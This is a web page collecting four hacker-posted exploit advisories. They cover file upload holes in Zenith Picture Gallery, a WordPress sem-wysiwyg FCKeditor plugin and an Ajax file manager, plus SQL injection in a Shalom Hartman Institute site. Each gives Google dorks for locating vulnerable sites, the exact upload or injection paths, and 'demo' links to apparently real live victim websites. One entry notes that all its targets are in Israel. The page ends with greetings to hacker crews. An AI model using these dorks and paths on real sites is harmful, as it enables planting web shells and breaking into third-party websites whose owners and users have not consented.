Search Bare

Online Users

Zenith Picture Gallery Remote File upload

# Exploit Title: Remote File Upload 
# Author: Bond Benz
# Category:: webapps
# Google dork: intext:"Powered by Zenith Picture Gallery" 
# Tested on: Linux/Ubuntu 10.04 and 12.04 LTS
==================================
Exploit : 
http://localhost/[path]/add.php
Your file will be Founded here
http://localhost/[path]/gallery/thumbify.php?pic=Shell.php.jpeg
Demo : 
http://firstbaptistnursery.org/gallery/add.php
==================================

Greet'Z To : r00tsect0r TEAM , Root-Developpers TM, Islam Hacker Pc , MTK , Thief Web , ShinoBi-Dz 
Mouh-Marvel And All Muslimans Hackers

Shalom Hartman Institute Sql Injection

################################################## #####
# Author => Fayzoun
# Facebook => http://fb.me/fayzoun.no.love
# Facebook page => http://fb.me/fayzoun.AO
# Google Dork => intext:Copyright ©2012 Shalom Hartman Institute - All rights reserved.
#Script : Shalom Hartman Institute
# Mail : fayzoun2@yahoo.fr / fayzoun@gmail.com
################################################## #####
# Exploit :
# http://localhost/EventsStudy_View.asp?Article_Id=60&Cat_Id=26
#note : All The Sites Are From Israel
#
################################################## #####
Gretz To :  - Pal Snipre - The Wolf - Salem Hassine 
Thanks To: God Allah

Wordpress sem WYSIWYG Arbitrary File Upload Vulnerability

# Exploit Title: Wordpress sem WYSIWYG Arbitrary File Upload Vulnerability
# Author: fayzoun
# facebook: https://www.facebook.com/fayzoun.AO
# Google Dork: inurl:wp-content/plugins/sem-wysiwyg/
# Tested on: win7
==================================
#Exploit:
http://localhost/path/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/connectors/test.html
upload your shell...
#D3m0:
http://www.anotherdailydose.com/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/connectors/test.html
http://embraceorerase.com/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html
####################################################
Greetz to: Musulman hackerz ^_^

Ajax file Manager Exploit

# Exploit Title: Ajax Remote File Upload 
# Author: Bond Benz
# Category:: webapps
# Google dork:  inurl:/plugins/ajaxfilemanager/
# Tested on: Linux / Ubuntu ( 10.04 LTS / 12.04 )
==================================
Exploit : 
When you put dork on google you will got many sites example :
http://www.nara-dealers.com/admin_new2/js/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/

Now Put  ajaxfilemanager/ajaxfilemanager.php after /plugins/ in url 
It's will be Like this :
http://localhost/path/js/tinymce/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php/ajaxfilemanager/

File Uploaded Found on /uploaded/yourfile.txt
http://localhost/[path]/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfile.txt


===================================
Greet'Z To : r00tsect0r TEAM , Root-Developpers TM, Islam Hacker Pc , MTK , Thief Web , ShinoBi-Dz, 
Mouh-Marvel And All Muslimans Hackers


 
Flag Counter